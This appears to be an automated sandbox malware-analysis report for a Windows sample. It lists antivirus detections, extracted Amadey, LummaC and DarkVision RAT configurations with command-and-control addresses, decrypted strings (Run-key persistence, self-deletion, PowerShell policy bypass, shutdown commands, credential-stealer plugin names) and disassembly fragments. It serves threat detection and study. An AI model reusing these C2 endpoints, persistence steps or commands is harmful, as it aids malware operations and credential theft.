                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeAvira: detection malicious, Label: TR/Kryptik.vwpow
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\EZs3CZC[1].exeAvira: detection malicious, Label: TR/AVI.Agent.onlpz
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\8sb9w_003[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\yo7qmvz[1].exeAvira: detection malicious, Label: TR/Kryptik.vwpow
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeAvira: detection malicious, Label: TR/Crypt.Agent.xahyo
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeAvira: detection malicious, Label: TR/Crypt.Agent.wdlug
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s7MG2VL[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "ddf4bb21335e58d5b0f7d6461dc868d9f8edb80615c104e1b714"}
                          Source: 31.2.svchost.exe.1dbe2750000.0.unpackMalware Configuration Extractor: DarkVision Rat {"C2": "82.29.67.160", "Port": 443}
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ZqkKpwG[1].exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\st22BJg[1].exeReversingLabs: Detection: 15%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\8sb9w_003[1].exeReversingLabs: Detection: 62%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\yo7qmvz[1].exeReversingLabs: Detection: 34%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\eAzoDbY[1].exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeReversingLabs: Detection: 62%
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeReversingLabs: Detection: 34%
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeReversingLabs: Detection: 15%
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeReversingLabs: Detection: 60%
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeReversingLabs: Detection: 29%
                          Source: C:\Windows\Temp\gvh50gjo_3616.sysReversingLabs: Detection: 20%
                          Source: 13s1HMkHKv.exeVirustotal: Detection: 58%Perma Link
                          Source: 13s1HMkHKv.exeReversingLabs: Detection: 60%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 176.113.115.6
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: /Ni9kiput/index.php
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: S-%lu-
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: bb556cff4a
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: rapes.exe
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Startup
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: cmd /C RMDIR /s/q
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: rundll32
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Programs
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: %USERPROFILE%
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: cred.dll|clip.dll|
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: cred.dll
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: clip.dll
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: http://
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: https://
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: /quiet
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: /Plugins/
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: &unit=
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: shell32.dll
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: kernel32.dll
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: GetNativeSystemInfo
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ProgramData\
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: AVAST Software
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Kaspersky Lab
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Panda Security
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Doctor Web
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 360TotalSecurity
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Bitdefender
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Norton
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Sophos
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Comodo
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: WinDefender
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 0123456789
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ------
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ?scr=1
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ComputerName
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: -unicode-
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: VideoID
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: DefaultSettings.XResolution
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: DefaultSettings.YResolution
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ProductName
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: CurrentBuild
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: rundll32.exe
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: "taskkill /f /im "
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: " && timeout 1 && del
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: && Exit"
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: " && ren
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Powershell.exe
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: -executionpolicy remotesigned -File "
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: shutdown -s -t 0
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: random
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Keyboard Layout\Preload
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 00000419
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 00000422
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 00000423
                          Source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 0000043f
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: citydisco.bet/gdJIS
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
                          Source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041EE8D CryptUnprotectData,CryptUnprotectData,17_2_0041EE8D
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041F9B0 CryptUnprotectData,17_2_0041F9B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0041B970 CryptUnprotectData,17_2_0041B970
                          Source: ps.exe, 00000026.00000002.2203329798.0000000140010000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_201bcc45-e

                          Exploits

                          barindex
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.svchost.exe.1dbe2750000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.83afc8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.83afc8.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001C.00000002.2039011701.0000000000434000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.2469971107.000001DBE2788000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2039794527.0000000000836000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 8sb9w_003.exe PID: 4840, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4260, type: MEMORYSTR

                          Bitcoin Miner

                          barindex
                          Source: Yara matchFile source: 50.2.EZs3CZC.exe.b00000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 50.0.EZs3CZC.exe.b00000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\EZs3CZC[1].exe, type: DROPPED

                          Compliance

                          barindex
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeUnpacked PE file: 38.2.ps.exe.910000.0.unpack
                          Source: 13s1HMkHKv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile opened: C:\Users\user\AppData\Local\Temp\msvcr80.dll
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61662 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61664 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61665 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61666 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61669 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61670 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61673 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61674 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61675 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61678 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61680 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61681 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61683 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61684 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.26.9.202:443 -> 192.168.2.6:61685 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61686 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:61689 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61690 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61694 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61695 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61697 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61701 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61702 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:61743 version: TLS 1.2
                          Source: Binary string: C:\Users\PC\Desktop\programms\1LOADER_PROXY\C#installer\ConsoleApp1\ConsoleApp1\obj\Release\net6.0\win-x64\ConsoleApp1.pdb source: rapes.exe, 0000000B.00000002.2491465283.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmp
                          Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbcccGCTL source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmp
                          Source: Binary string: C:\Users\PC\Desktop\programms\1LOADER_PROXY\C#installer\ConsoleApp1\ConsoleApp1\obj\Release\net6.0\win-x64\ConsoleApp1.pdbSHA256 source: rapes.exe, 0000000B.00000002.2491465283.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C2FCDE FindFirstFileExW,15_2_00C2FCDE
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C2FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_00C2FD8F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C2FCDE FindFirstFileExW,17_2_00C2FCDE
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C2FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00C2FD8F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], esi17_2_0044D840
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1FFE9D9Ch]17_2_004208E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edx, word ptr [eax]17_2_0041094F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ecx], al17_2_0043892B
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ebx], al17_2_0043892B
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34A9C9D8h]17_2_0040D9E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+4Ch]17_2_0040F200
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+343E7F64h]17_2_0042F3D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 5F115B3Dh17_2_0044E390
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6B78D99Eh]17_2_004374BA
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], A18B8074h17_2_00412CBC
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+73E85C6Ah]17_2_0044EE50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-32C32B10h]17_2_00444F20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h17_2_0044D730
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-4Ah]17_2_00412FAF
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+1FFE9D90h]17_2_00449000
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then jmp eax17_2_0042C820
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 744E5843h17_2_004490C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1FFE9D9Ch]17_2_004490C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edi], cl17_2_004360D3
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+4Ch]17_2_0040F8D9
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-28EB41BAh]17_2_004300E1
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h17_2_0043309C
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+558B175Ah]17_2_0042F960
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]17_2_0040A1F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]17_2_0040A1F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+1FFE9D9Ch]17_2_0041C1F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]17_2_004291A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+1FFE9D9Ch]17_2_0041B9A7
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ebx], cl17_2_004359B3
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+10h]17_2_00421A20
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then add ecx, eax17_2_0042EA30
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx]17_2_00444AE0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+1FFE9D9Ch]17_2_0041C2E8
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx]17_2_00446AF9
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov esi, dword ptr [esp+3Ch]17_2_00434AB0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov dword ptr [esi+04h], edx17_2_0041E2BE
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then jmp eax17_2_0042CB50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ebx], al17_2_00435B7F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ecx], bl17_2_004113C6
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1FFE9D90h]17_2_004493E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edx], al17_2_00437B85
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [esi], cl17_2_00436389
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edi], cl17_2_00436389
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ebx, byte ptr [edx]17_2_004423B0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ebx], al17_2_00435C04
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h17_2_00428C10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ebx], al17_2_00435B56
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]17_2_0042243F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-4FDD7520h]17_2_004284D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h17_2_004284D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov word ptr [ebx], cx17_2_004284D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [esi], cl17_2_004364FA
